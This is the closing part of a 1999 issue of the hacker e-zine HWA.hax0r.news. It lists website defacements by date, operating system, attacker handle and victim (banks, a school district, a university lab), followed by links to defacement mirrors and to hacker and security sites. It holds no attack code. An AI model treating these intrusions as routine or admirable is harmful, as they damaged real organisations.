[99.09.26] NT [Forro Mob]      Uniflex (BR) (www.uniflex.com.br)
[99.09.26] BI [FOaM]         M Xtreme Webs (www.xtremewebs.com)
[99.09.28] NT [ytcracker]      Altamira International Bank (www.altabank.com)
[99.09.28] NT [ytcracker]      Fun Caribbean (www.funcaribbean.com)
[99.09.28] NT [Narcissus]    M K Mount Gay (www.mountgay.com)
[99.09.28] NT [HIT2000]        Le Monde Pub (www.mondepub.fr)
[99.09.28] NT [induce]         Türkiye'nin bir numarali televizyon kanali (www.atv.com.tr)
[99.09.28] NT [fEAR-mE]        BT USA (www.btusa.com)
[99.09.28] NT [ ]              #4 Hoffman Bikes (www.hoffmanbikes.com)
[99.09.30] BI [Mister-X]       DeltaNet (www2.deltanet.com)
[99.09.30] NT [GOD]            Crockett County School District (www.technology.crockett.k12.tn.us)
[99.09.30] HP [hV2k]           #2 Geofluids Engineering Lab, Seoul National University (petro.snu.ac.kr)
[99.09.30] So [mistuh clean]   Web Yes Singapore (singapore.webyes.com)
[99.09.30] Li [ ]              Suid Root (www.suidroot.org)
[99.09.30] NT [139_r00ted]     PanAmSat Corporation (www.panamsat.com)

[9/28/99]
Defaced: http://www.mondepub.fr/
By: HIT2000
Mirror: http://www.attrition.org/mirror/attrition/1999/09/28/www.mondepub.fr
OS: NT

[9/28/99]
Defaced: http://www.atv.com.tr
By: induce
Mirror: http://www.attrition.org/mirror/attrition/1999/09/28/www.atv.com.tr
OS: NT

and more sites at the attrition cracked web sites mirror:

http://www.attrition.org/mirror/attrition/index.html
-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________

A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a links section
on the http://welcome.to/HWA.hax0r.news/ url so check there for current links
etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/

HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/

International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others please send in news site links that have
security news from foreign countries for inclusion in this list thanks...
- Ed

Belgium.......: http://bewoner.dma.be/cum/
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Finland ......: http://hackunlimited.com/
Germany ......: http://www.alldas.de/
                http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa .: http://www.hackers.co.za
                http://www.hack.co.za
                http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and
                best security related e-zine.

.za (South Africa) sites contributed by wyzwun tnx guy...

Got a link for this section? email it to hwa@press.usmc.net and I'll review
it and post it here if it merits it.

@HWA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]